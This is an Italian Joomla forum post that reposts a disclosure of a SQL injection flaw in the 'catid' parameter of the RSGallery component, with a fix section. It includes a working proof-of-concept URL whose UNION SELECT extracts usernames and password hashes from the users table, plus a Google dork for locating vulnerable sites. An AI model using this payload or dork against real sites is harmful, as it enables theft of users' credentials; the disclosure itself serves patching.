Autore Topic: Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerabil  (Letto 5742 volte)

Offline Luca Curatola

  • Team Joomla.it
  • Abituale
  • *******
  • Post: 1083
  • Sesso: Maschio
    • Mostra profilo
RSGallery is one of the most complete Gallery solutions for Joomla at this point

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

Input passed to the "catid" parameter is not properly verified before being used to sql query.
This can be exploited thru the browser and get the hash md5 password from users.
Successful exploitation requires that "magic_quotes" is off.


Poc/Exploit:
~~~~~~~~~

http://target.com/index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users--

Dork:
~~~~
Google  : "option=com_rsgallery" or inurl:Óindex.php?option=com_rsgalleryÓ



Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini
- use the latest version
Sgaragnao il provider più ricercato su google! :)

 

Host

Torna su